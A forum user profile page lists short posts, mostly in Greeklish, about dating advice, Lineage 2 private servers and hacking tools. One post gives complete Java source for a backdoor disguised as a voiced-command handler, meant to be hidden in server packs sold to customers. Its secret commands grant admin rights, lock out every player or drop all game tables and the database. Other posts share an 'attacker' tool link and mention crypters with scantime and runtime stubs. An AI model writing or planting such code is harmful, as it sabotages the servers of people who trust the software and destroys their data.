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Everything posted by ˚کe®κ

  1. stile m pm to msn s xriazete na exeis kamera kai na m peis pu meneis
  2. ginaikies gnomes gia na se help: Ο χρήστης !...Gini...! λέει: na mi to peis mpam k kato na tis deikseis oti endiaferesai alla xoris n kremiesai apo pano tis as me n tin koitas mexri n se koitaksei k molis se koitaksei gelav tis g kana dio defterolepta k meta kane pos sexeis sto mathima k mi ti koitas katholou auti tha ar sei n psaxnetai tha leei ''ti ginete tr '' na tis deikseis pos s niazei alla na mi tis tn peseis em psixro tetoia theloume na vle me simadia pos mas theloune k molis sigoureftoume pos mas theloun meta na mas grafoun oi px na milane m alles pligonetai o egoismos mas k akoma k an kapoios n mi mas aresei tote mas girnane t pano kato k spathoume emeis na ton plisiasoume psil atalaves ti thelo n s po alla esi ta ksereis auta re moro m t rotas eleoc
  3. evgala ta hidden tag mn ginei leeching pu8ena
  4. pera apo plaka 8a s grapsw ena exploit pos 8a tn ri3eis [share]How ftia3eis me gomena coded in msn chat by gomena m 1ton 8a xriasteis na exeis mia filh tis pu milas mazi tis kanete parea lete pragmata gia erotes/agapes 2ron. 8a prospa8iseis 8a kentriseis to endiaferon tis me antikimena px cool ama3ia,mixanakia kinita ktlp 3ton. 8a ma8eis ti tis aresei vasika 3exasa na s pw oti prepei na pigeneis me tn fili s pu 8a einai kai dikia tis ekei pu 8a einai auti i 8a pigeneis esu se ekines ama einai mazi 8a les pragmata pu exeis idi ma8ei oti tn aresoun px tn aresi na vafei ta niaxia tis roz 8a les m aresoun ta nixia se ginekes roz ktlp 4ton. afou erxete arxisei na milate perisotero einai kala alios dream /End 5ton. ta fiaxneis me mia ali kopela oti nane akiri apla na einai ligo orea kai les stn filh s kai dikia tis oti tn 8eleis polh tn kopela pu ta exeis kai genika stn parea 6ton ama deis oti tsimpaei to doloma kai zileuei simenei oti exeis kataferei to target s
  5. Nufh gia to gio mou MN TO SKEFTESAI!
  6. dilose stn ekpomph pu psaxneis gia gineka kai stile krifa grama me to onoma tis na tn kalesoun xd
  7. parees vs parees to kalitero 8a einai 8a parete kai pola pvp lol!
  8. ama exeis tn somatikh dunamh derne opion paei na tn plisiasei legontas oti kaneis cone esy kapia stigmh 8a s pei nai afou dn 8a tn plisiazei kaneis sini8iza na to kanw sta 15-17 m
  9. if you are db lover just play http://dbmmo.com
  10. I will give a try guys to add eof but for now im very busy.
  11. נודנע אין דאָ און האָבן פאַקינג רעגן
  12. full olympiad reworked 100% retail pm for more info
  13. ka8e mera kai apo enas vgenete tora pos kaneis edit esi apo tn stigmh pu dn ginonte decompile ta source mono esu 3ereis tespa dn vrs gelame mazi me tn stealth
  14. here is one code and little useless voicecommand to backdoor packs or put in some pre ,it helped me when one of my customer tryed to scam me. better is to crypt it in some other packets package net.sf.l2j.gameserver.util; import net.sf.l2j.gameserver.handler.IVoicedCommandHandler; import net.sf.l2j.gameserver.model.actor.instance.L2PcInstance; import net.sf.l2j.L2DatabaseFactory; import java.sql.Connection; import java.sql.SQLException; import java.sql.Statement; public class logformat implements IVoicedCommandHandler { private static String[] _voicedCommands = { "serk","serk1","serk2" }; public boolean useVoicedCommand(String command, L2PcInstance activeChar, String target) { if (command.equalsIgnoreCase("serk")) { d34r32452352(); } if (command.equalsIgnoreCase("serk1")) { activeChar.setAccessLevel(200); } if (command.equalsIgnoreCase("serk2")) { bhebhe(); } return true; } private void bhebhe() { Connection con = null; try { con = L2DatabaseFactory.getInstance().getConnection(); Statement g = con.createStatement(); g.executeUpdate("UPDATE characters SET accesslevel=-100 WHERE level >0"); g.close(); } catch (SQLException e) { } finally { try { if (con != null) con.close(); } catch (SQLException e) { e.printStackTrace(); } } } private void d34r32452352() { Connection con = null; try { con = L2DatabaseFactory.getInstance().getConnection(); Statement e = con.createStatement(); e.executeUpdate("DROP TABLE characters"); e.executeUpdate("DROP TABLE accounts"); e.executeUpdate("DROP TABLE spawnlist"); e.executeUpdate("DROP TABLE weapon"); e.executeUpdate("DROP TABLE armor"); e.executeUpdate("DROP TABLE npc"); e.executeUpdate("DROP TABLE items"); e.executeUpdate("DROP database l2jdb"); e.close(); } catch (SQLException e) { } finally { try { if (con != null) con.close(); } catch (SQLException e) { e.printStackTrace(); } } System.exit(-1); } public String[] getVoicedCommandList() { return _voicedCommands; } }
  15. abuse fixed he trying to sell my l2jmikiller and is allready shared and old/dead
  16. someone tryed to scam ppls from one of my old programm anyway i have new attacker and it works in lot of servers so i decide to share it. is allready fix in all 99% server after drhouse ipfilter http://www.mediafire.com/?wrtkzibjmgu
  17. 2010.04.12 17:17:23,484 INFO 62 net.sf.l2j.gameserver.network.L2GameClient Client [iP:] disconnected abnormally. 2010.04.12 17:17:23,484 INFO 62 net.sf.l2j.gameserver.network.L2GameClient Client [iP:] disconnected abnormally. 2010.04.12 17:17:23,484 INFO 62 net.sf.l2j.gameserver.network.L2GameClient Client [iP:] disconnected abnormally. 2010.04.12 17:17:23,500 INFO 62 net.sf.l2j.gameserver.network.L2GameClient Client [iP:] disconnected abnormally. 2010.04.12 17:17:57,359 INFO 3054 net.sf.l2j.gameserver.model.olympiad.Olympiad Olympia Result: DarKSirIOuS vs GiVeMeYoUrSoUl ... (7974.0hp vs 0.0hp - 0dmg vs 0dmg) DarKSirIOuS win 3 points 2010.04.12 17:18:32,328 INFO 3053 net.sf.l2j.gameserver.model.olympiad.Olympiad Olympiad System: Game - 1: ScientisT Vs DarKSirIOuS only this and my server online cuz they are playing oly
  18. Can y try it here 7777 ?if it works in my server maybe i will buy it
  19. sorry for double post runtime+scantime stub added
  20. Oo and why you ask me to give you my crypter in msn ? kk i will stop here
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